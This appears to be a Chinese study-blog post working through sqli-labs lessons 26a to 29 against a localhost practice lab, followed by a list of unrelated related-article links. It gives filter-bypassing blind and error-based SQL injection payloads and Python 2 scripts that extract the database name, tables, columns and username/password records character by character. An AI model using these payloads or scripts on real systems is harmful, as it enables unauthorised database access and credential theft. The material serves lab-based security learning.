DAY 5

sqli-labs lesson 26a

  • 闭合符号为单引号和括号,并且不回显错误,如果服务器是Linux,尝试%a0代替空格,这里尝试使用布尔型
  • 数据库名长度:?id=1’)&&if(length(database())=8,1,0)||('0
  • 爆库:?id=1’)&&if(left(database(),8)=‘security’,1,0)||('0
  • 爆表:

    • 当返回为真,长度为914,返回为假,长度为863
    • 编写Python脚本辅助解题:
      #coding:utf-8
      import urllib
      
      print "26a"
      url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
      html = urllib.urlopen(url).read()
      
      pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
      end_url = "||(%270"
      # condition = ""
      # payload = "if((" + condition + "),1,0)"
      
      from_ = "infoorrmation_schema.tables"
      where = "table_schema='security'"
      select = "select(group_concat(table_name))from(" + from_ + ")where(" + where + ")"
      result = []
      for pos in range(1,100):
          # 判断出界
          condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(127)
          payload = "if((" + condition + "),1,0)"
          url = pre_url + payload + end_url
          if "Your Login name" in urllib.urlopen(url).read():
              print "".join(result)
              exit()
          # 没有出界
          asc1 = 32
          asc2 = 127
          while not asc1 >= asc2:
              # 判断出界
              condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
              payload = "if((" + condition + "),1,0)"
              url = pre_url + payload + end_url
              # print url
              if "Your Login name" in urllib.urlopen(url).read():
                  asc1 = (asc1+asc2)//2 + 1
              else:
                  asc2 = (asc1+asc2)//2
          result.append(chr(asc1))
          print "".join(result)
      

  • 爆字段:
#coding:utf-8
import urllib

print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"

from_ = "infoorrmation_schema.columns"
where = "table_schema='security'%26%26table_name='users'"
select = "select(group_concat(column_name))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
    # 判断出界
    condition = "length((" + select + "))<" + str(pos)
    payload = "if((" + condition + "),1,0)"
    url = pre_url + payload + end_url
    if "Your Login name" in urllib.urlopen(url).read():
        print "".join(result)
        print "CRACKED"
        exit()
    # 没有出界
    asc1 = 32
    asc2 = 127
    while not asc1 >= asc2:
        # 判断出界
        condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
        payload = "if((" + condition + "),1,0)"
        url = pre_url + payload + end_url
        # print url
        if "Your Login name" in urllib.urlopen(url).read():
            asc1 = (asc1+asc2)//2 + 1
        else:
            asc2 = (asc1+asc2)//2
    result.append(chr(asc1))
    print "".join(result)
  • 爆记录:
#coding:utf-8
import urllib

print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"

from_ = "users"
where = "1=1"
select = "select(group_concat(concat(username,passwoorrd)))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
    # 判断出界
    condition = "length((" + select + "))<" + str(pos)
    payload = "if((" + condition + "),1,0)"
    url = pre_url + payload + end_url
    if "Your Login name" in urllib.urlopen(url).read():
        print "".join(result)
        print "CRACKED"
        exit()
    # 没有出界
    asc1 = 32
    asc2 = 127
    while not asc1 >= asc2:
        # 判断出界
        condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
        payload = "if((" + condition + "),1,0)"
        url = pre_url + payload + end_url
        # print url
        if "Your Login name" in urllib.urlopen(url).read():
            asc1 = (asc1+asc2)//2 + 1
        else:
            asc2 = (asc1+asc2)//2
    result.append(chr(asc1))
    print "".join(result)

注:最大破解长度可以更改

sqli-labs lesson 27

  • 过滤了select、SELECT和Select等,直接报错注入
  • 爆库:?id=1%27%26%26extractvalue(1,concat(0x7e,(database()),0x7e))||%27
  • 爆表:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema=‘security’)),0x7e))||’
  • 爆字段:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_schema=‘security’%26%26table_name=‘users’)),0x7e))||’
  • 爆记录:http://localhost/sqli-labs-master/Less-27/?id=1'%26%26extractvalue(1,concat(0x7e,mid((seLect(group_concat(concat_ws(',',username,password)))from(security.users)),position,length),0x7e))||%27

sqli-labs 27a

  • 依然是盲注
  • 注入点与闭合符号的检测:?id=1"%26%260||"0
  • 爆库:
#coding:utf-8
import urllib

print "27a"
# url = "http://localhost/sqli-labs-master/Less-27/?id=1%22a)%26%26if(1,1,0)||(%220"
# html = urllib.urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-27a/?id=1%22%26%26"
end_url = "||%220"
# condition = ""
# payload = "if((" + condition + "),1,0)"

from_ = "users"
where = "1=1"
# select = "seLect(group_concat(concat(username,password)))from(" + from_ + ")where(" + where + ")"
select = "database()"
result = []
for pos in range(1,100):
    # 判断出界
    condition = "length((" + select + "))<" + str(pos)
    payload = "if((" + condition + "),1,0)"
    url = pre_url + payload + end_url
    if "Your Login name" in urllib.urlopen(url).read():
        print "".join(result)
        print "CRACKED"
        exit()
    # 没有出界
    asc1 = 32
    asc2 = 127
    while not asc1 >= asc2:
        # 判断出界
        condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
        payload = "if((" + condition + "),1,0)"
        url = pre_url + payload + end_url
        # print url
        if "Your Login name" in urllib.urlopen(url).read():
            asc1 = (asc1+asc2)//2 + 1
        else:
            asc2 = (asc1+asc2)//2
    result.append(chr(asc1))
    print "".join(result)

  • 爆表,爆字段,爆记录:代码同lesson 26a,更改url即可

sqli-labs lesson 28

  • 闭合符号为’),盲注与上一题同解
  • 报错注入同lesson 27

sqli-labs lesson 28a

  • 与lesson 28的盲注同解

sqli-labs lesson 29

sqli-labs学习笔记 DAY5的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. Python学习笔记——Day5(转载)

    python 编码转换 主要介绍了python的编码机制,unicode, utf-8, utf-16, GBK, GB2312,ISO-8859-1 等编码之间的转换. 常见的编码转换分为以下几种情 ...

  3. Python学习笔记-Day5

    冒泡算法: 实现1: a = [,,,,,,,,,,,,,,] def bubble(badlist): sort = False while not sort: sort = True ): ]: ...

  4. Python学习笔记day5

    模块 1.自定义模块 自定义模块就是在当前目录下创建__init__.py这个空文件,这样外面的程序才能识别此目录为模块包并导入 上图中libs目录下有__init__.py文件,index.py程序 ...

  5. 学习笔记day5:inline inline-block block区别

    1. block元素可以包含block元素和inline元素:但inline元素只能包含inline元素.要注意的是这个是个大概的说法,每个特定的元素能包含的元素也是特定的,所以具体到个别元素上,这条 ...

  6. JS学习笔记Day5

    一.变量的作用域 1.作用域:变量的作用范围 2.全局变量:变量在整个程序都是有效的(从程序开始到程序结束变量均有效)在函数体外部定义的变量都是全局变量:在函数体内部 没有用var定义的变量也有可能是 ...

  7. HTML学习笔记Day5

    一.CSS属性 1.文本溢出是否“...”显示属性:text-overflow:clip(不显示省略标记)/ellipsis(文本溢出时“...”显示) 定义此属性有四个必要条件:1)须有容器宽度:w ...

  8. Python学习笔记 - day5 - 文件操作

    Python文件操作 读写文件是最常见的IO操作,在磁盘上读写文件的功能都是由操作系统提供的,操作系统不允许普通的程序直接操作磁盘(大部分程序都需要间接的通过操作系统来完成对硬件的操作),所以,读写文 ...

  9. 商业爬虫学习笔记day5

    一. 发送post请求 import requests url = "" # 发送post请求 data = { } response = requests.post(url, d ...

随机推荐

  1. Odoo前端页面模版渲染引擎——Jinja2用法教程

    转载请注明原文地址:https://www.cnblogs.com/cnodoo/p/9307200.html  一:渲染模版 要渲染一个qweb模板文件,通过render_template方法即可. ...

  2. SSM框架之批量增加示例(同步请求jsp视图解析)

    准备环境:SSM框架+JDK8/JDK7+MySQL5.7+MAVEN3以上+Tomcat8/7应用服务器 示例说明: 分发给用户优惠券,通过checkbox选中批量分发,对应也就是批量增加. 对于公 ...

  3. SVN 客户端使用

    一.TortoiseSVN基本设置 1.1 客户端设置     1.1  语言设置       二.基本操作 2.1 浏览服务器           用户名跟密码,跟公司配置管理员人员获取,没有专门的 ...

  4. Docker实战(一)之使用Docker镜像

    镜像是Docker三大核心概念中最为重要的,自Docker诞生之日起“镜像”就是相关社区最为热门的关键字. Docker运行容器前需要本地存在对应的镜像,如果镜像没有保存至本地,Docker会尝试先从 ...

  5. 简单说说Vue

    Vue.js是这次我们公司迭代项目使用的前端框架之一.我们前端使用的是一个叫Metronic的.Metronic的可以说是bootstrap系列的集合. 当然也用到一个叫layui的,layui的话就 ...

  6. django admin自定义

    django admin自定义 class CustomerAdmin(admin.ModelAdmin): list_display = ('id','name','qq','consultant' ...

  7. CCF 201709-2公共钥匙盒

    问题描述 有一个学校的老师共用N个教室,按照规定,所有的钥匙都必须放在公共钥匙盒里,老师不能带钥匙回家.每次老师上课前,都从公共钥匙盒里找到自己上课的教室的钥匙去开门,上完课后,再将钥匙放回到钥匙盒中 ...

  8. Nivo Slider用法

    示例代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF ...

  9. python3爬虫-知乎登陆

    py文件: from fake_useragent import UserAgent import requests from http import cookiejar import base64 ...

  10. 白帽子讲web安全——访问控制

    上一章说的认证与会话管理,这章是访问控制,刚看访问控制这章的时候,感觉跟上章的“授权”没什么区别,第一感受就是“授权”. 之后看了才进一步了解,“授权”是好比屋子的主人进来了,那么他可以坐在客厅,也可 ...